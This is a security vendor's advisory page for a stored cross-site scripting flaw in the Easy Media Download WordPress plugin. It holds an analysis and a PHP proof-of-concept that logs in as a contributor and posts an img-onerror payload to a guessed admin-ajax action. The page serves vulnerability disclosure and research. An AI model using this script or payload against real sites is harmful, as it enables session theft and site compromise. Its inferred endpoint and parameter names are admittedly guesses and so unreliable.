Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-69169: Easy Media Download <= 1.1.11 – Authenticated (Contributor+) Stored Cross-Site Scripting (easy-media-download)

Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 1.1.11
Patched Version
Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69169 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Easy Media Download WordPress plugin. Attackers with contributor-level or higher privileges can inject malicious scripts into site content. The injected scripts execute when a victim accesses the compromised page. The CVSS score of 6.4 reflects a medium severity issue with scope change and impacts on confidentiality and integrity.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping, as indicated by CWE-79. The vulnerability description confirms this. Without a code diff, we cannot identify the exact vulnerable function. The flaw likely exists in a plugin feature where user-supplied input is saved to the database and later rendered without proper escaping. Common WordPress patterns include shortcode attributes, form submissions processed via AJAX or admin-post endpoints, or data saved from meta boxes.

An attacker exploits this by authenticating as a contributor. They would then submit a malicious payload to a plugin endpoint that handles content creation or update. The payload would be a standard XSS vector like `alert(document.domain)` or an event handler such as ``. Based on the plugin’s purpose for media downloads, the injection point could be a download link title, description field, or shortcode parameter. The payload stores in the database.

The fix in version 1.1.12 likely involves implementing proper input sanitization using WordPress functions like `sanitize_text_field` or `wp_kses`. Output escaping functions like `esc_html` or `esc_attr` were probably added where the user-controlled data is echoed. The patch ensures all dynamic content rendered in HTML context is escaped before display.

Successful exploitation allows an attacker to perform actions within the victim’s browser context. This can lead to session hijacking, content defacement, or malicious redirects. For administrators, this could facilitate privilege escalation by stealing cookies or manipulating administrative interfaces. The stored nature means a single injection affects all users who view the compromised page.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-69169 - Easy Media Download <= 1.1.11 - Authenticated (Contributor+) Stored Cross-Site Scripting
<?php
/**
 * Proof of Concept for CVE-2025-69169.
 * ASSUMPTIONS: The vulnerability exists in a POST request handled by the plugin.
 * The exact parameter and endpoint are inferred from common WordPress plugin patterns.
 * This script targets a hypothetical AJAX action or admin-post endpoint.
 * Adjust the $action and $target_param variables if the actual endpoint differs.
 */

$target_url = 'http://victim-site.com/wp-admin/admin-ajax.php'; // Common WordPress AJAX handler
// Alternative endpoint: $target_url = 'http://victim-site.com/wp-admin/admin-post.php';

$username = 'contributor_user'; // Attacker's contributor-level username
$password = 'contributor_password'; // Attacker's password

// Inferred action name based on plugin slug 'easy-media-download'
$action = 'easy_media_download_save'; // This is an assumption. The real action may differ.
// Inferred vulnerable parameter name
$target_param = 'download_description'; // This is an assumption.

// Malicious payload for stored XSS
$payload = '<img src=x onerror="alert(`Atomic Edge XSS: `+document.domain)">';

// Step 1: Authenticate to get cookies
$login_url = 'http://victim-site.com/wp-login.php';
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => 'http://victim-site.com/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
]);
$response = curl_exec($ch);

// Step 2: Send exploit payload to the vulnerable endpoint
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POSTFIELDS => http_build_query([
        'action' => $action,
        $target_param => $payload,
        // WordPress AJAX endpoints often require a nonce, but the vulnerability may bypass this.
        // If a nonce is required, the script would need to extract it from a prior page.
        // This PoC assumes the vulnerability exists without proper nonce verification.
    ]),
    CURLOPT_COOKIEFILE => 'cookies.txt',
]);
$response = curl_exec($ch);
curl_close($ch);

// Check for success indicators
if (strpos($response, 'success') !== false || strpos($response, 'saved') !== false) {
    echo "[+] Payload likely injected. Check the front-end page where the parameter is displayed.n";
} else {
    echo "[-] Injection may have failed. Verify endpoint, action, and parameter names.n";
    echo "Response snippet: " . substr($response, 0, 500) . "n";
}

unlink('cookies.txt'); // Clean up
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School